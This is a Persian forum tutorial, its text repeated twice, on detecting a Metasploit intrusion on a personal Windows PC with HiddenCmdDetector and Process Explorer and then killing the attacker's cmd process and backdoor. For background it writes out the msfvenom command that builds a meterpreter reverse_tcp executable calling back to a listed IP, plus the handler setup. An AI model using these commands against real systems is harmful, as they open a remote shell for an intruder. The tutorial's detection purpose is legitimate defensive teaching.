درود.
در این تاپیک قصد دارم کمی به موضوع تشخیص هکر در سیستم شخصی خودمون بپردازم و راجبش بحث کنیم ...
در این آموزش فرض رو بر این میگیریم که هکر تونسته با استفاده از متاسپلویت و فایل مخرب از سیستم ما اکسس بگیره .. زیاد وارد جزئیات نمیشیم !!
در این نوع حمله هکر با استفاده از یک فایل مخرب ساخته شده توسط کالی لینوکس و ارسال اون به قربانی میتونه از سیستم قربانی دسترسی لازم رو بگیره. فایل مخرب به عنوان یک بکدور در سیستم قربانی عمل خواهد کرد.
خلاصه دستورات ساخت و استفاده جهت ایجاد دسترسی از قربانی :
حالا بعد از ایجاد دسترسی با اجرای دستور sysinfo اطلاعاتی از تارگت رو باید مشاهده نمایید :
بعد از ایجاد دسترسی شما با دستور shell در محیط متاسپلویت میتوانید خط فرمان ویندوز قربانی را در اختیار داشته باشید و کارهای موردنظر خودتون رو انجام بدین.
خب حالا برای تشخیص اینکه در سیتسم ما هکر نفوذ داره یا خیر میتونیم از ابزار HiddenCmdDetector استفاده کنیم.
شیوه کارکرد این ابزار به اینگونه هستش که میاد cmd های مختلفی که روی سیستم ما باز هست رو برای ما نمایش میده که در حالت عادی باید یک cmd رو بصورت باز نشون بده اونم برای این هستش که ما خودمون در سیستم خودمان در محیط cmd باید این ابزار رو استفاده کنیم که در ادامه متوجه خواهید شد ...
این ابزار رو بعد از دانلود در دسکتاپ قرار میدهیم و دستورات زیر را اجرا میکنیم :
من سیستم ویندوزیم 32 بیتی هست پس HiddenCmdDetector32.exe رو انتخاب میکنم.
خروجی برای سیستم من این هستش :
خب معلومه یک cmd اضافی باز هست و بنابراین هکر محترم برروی سیستم من فعالیت داره :دی
حالا از کجا باید فهمید کدوم cmd مربوط به خودم هستش و کدامیک مربوط به هکر ؟؟!!
برای اینکه به این نتیجه برسیم میتوانیم از ابزار Process Explorer استفاده کنیم.
این ابزار را باز کنین و به دنبال پراسس هایی با Process_ID های نمایش داده شده بگردید ...
در گام بعدی باید تک تک اونا رو تست کنین ببینیم کدامیک مربوط به cmd خود سیستم شماست و دیگری رو که مربوط به هکر هست چطوری ارتباطش رو kill کنین !!
برروی تک تک پراسس ها راست کلیک کنین و Properties رو بزنین.
خب حالا در پنجره properties باز شده در سربرگ Image و در قسمت Current Directory شما میتونین به این موضوع پی ببرید ..
برای مثال برای پراسس اول به اینصورت هست :
و برای پراسس دوم به اینصورت هست :
خب پس میتونیم بفهمیم که پراسس اولی مربوط به سیتسم خودمون هست چون ابزار HiddenCmdDetector رو توش اجرا کردیم .. ولی پراسس دومی در واقع در اون دایرکتوری فوق اقدام به باز کردن cmd کرده است در حالیکه امکانش نیست !!
برای جلوگیری از اینکار در همان پنجره Properties میتوانید برروی دکمه Kill Process کلیک کنین !!!
خب با انجام اینکار دسترسی هکر از خط فرمان سیستم شما قطع خواهد شد ولی قضیه باز همچنان ادامه داره
چون اگه کمی دقت کنیم فایلی بنام test این دسترسی رو به هکر میده و هکر باز هم میتونه از خط فرمان سیستم شما دسترسی بگیره !!
برای قطع کردن دسترسی هکر بطور کلی میتوانید در همان Process Explorer برروی فایلی که این دسترسی رو برا هکر تامین میکنه ینی فایل test راست کنین و در پنجره Properties اونو Kill Process کنین !!
خب دیگه بطور کلی ارتباط هکر از سیستم شما Denied خواهد شد !!
نمایش متون توی TextBox ها بی نظم هست مشکل از سایت هست رسیدگی کنین لطفا !!
در این تاپیک قصد دارم کمی به موضوع تشخیص هکر در سیستم شخصی خودمون بپردازم و راجبش بحث کنیم ...
در این آموزش فرض رو بر این میگیریم که هکر تونسته با استفاده از متاسپلویت و فایل مخرب از سیستم ما اکسس بگیره .. زیاد وارد جزئیات نمیشیم !!
در این نوع حمله هکر با استفاده از یک فایل مخرب ساخته شده توسط کالی لینوکس و ارسال اون به قربانی میتونه از سیستم قربانی دسترسی لازم رو بگیره. فایل مخرب به عنوان یک بکدور در سیستم قربانی عمل خواهد کرد.
خلاصه دستورات ساخت و استفاده جهت ایجاد دسترسی از قربانی :
کد:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=5.235.36.25 LPORT=4444 R > server.exe metasploit : use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 5.235.36.25 set LPOR 4444 show options exploit
کد:
Computer : TARGET-PC OS : Windows 7 (Build 7600) Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/win32
خب حالا برای تشخیص اینکه در سیتسم ما هکر نفوذ داره یا خیر میتونیم از ابزار HiddenCmdDetector استفاده کنیم.
شیوه کارکرد این ابزار به اینگونه هستش که میاد cmd های مختلفی که روی سیستم ما باز هست رو برای ما نمایش میده که در حالت عادی باید یک cmd رو بصورت باز نشون بده اونم برای این هستش که ما خودمون در سیستم خودمان در محیط cmd باید این ابزار رو استفاده کنیم که در ادامه متوجه خواهید شد ...
این ابزار رو بعد از دانلود در دسکتاپ قرار میدهیم و دستورات زیر را اجرا میکنیم :
کد:
cd desktop cd HiddenCmdDetection HiddenCmdDetector32.exe -x
خروجی برای سیستم من این هستش :
کد:
<Cmd_Process>
<Process_ID> 5752 </Process_ID>
<Parent_Process_ID> 3228 </Parent_Process_ID>
<Process_Name> Cmd.exe </Process_Name>
<User_Name> any </User_Name>
<Process_Path> C:\Windows\system32\cmd.exe </Process_Path>
</Cmd_Process>
----------------------------------------------------------------
<Cmd_Process>
<Process_ID> 2600 </Process_ID>
<Parent_Process_ID> 3100 </Parent_Process_ID>
<Process_Name> Cmd.exe </Process_Name>
<User_Name> any </User_Name>
<Process_Path> C:\Windows\system32\cmd.exe </Process_Path>
</Cmd_Process>
حالا از کجا باید فهمید کدوم cmd مربوط به خودم هستش و کدامیک مربوط به هکر ؟؟!!
برای اینکه به این نتیجه برسیم میتوانیم از ابزار Process Explorer استفاده کنیم.
این ابزار را باز کنین و به دنبال پراسس هایی با Process_ID های نمایش داده شده بگردید ...
در گام بعدی باید تک تک اونا رو تست کنین ببینیم کدامیک مربوط به cmd خود سیستم شماست و دیگری رو که مربوط به هکر هست چطوری ارتباطش رو kill کنین !!
برروی تک تک پراسس ها راست کلیک کنین و Properties رو بزنین.
خب حالا در پنجره properties باز شده در سربرگ Image و در قسمت Current Directory شما میتونین به این موضوع پی ببرید ..
برای مثال برای پراسس اول به اینصورت هست :
کد:
C:\Users\any\Desktop\HiddenCmdDetector
کد:
C:\Program Files\Test\PFG
برای جلوگیری از اینکار در همان پنجره Properties میتوانید برروی دکمه Kill Process کلیک کنین !!!
خب با انجام اینکار دسترسی هکر از خط فرمان سیستم شما قطع خواهد شد ولی قضیه باز همچنان ادامه داره
چون اگه کمی دقت کنیم فایلی بنام test این دسترسی رو به هکر میده و هکر باز هم میتونه از خط فرمان سیستم شما دسترسی بگیره !!
برای قطع کردن دسترسی هکر بطور کلی میتوانید در همان Process Explorer برروی فایلی که این دسترسی رو برا هکر تامین میکنه ینی فایل test راست کنین و در پنجره Properties اونو Kill Process کنین !!
خب دیگه بطور کلی ارتباط هکر از سیستم شما Denied خواهد شد !!
نمایش متون توی TextBox ها بی نظم هست مشکل از سایت هست رسیدگی کنین لطفا !!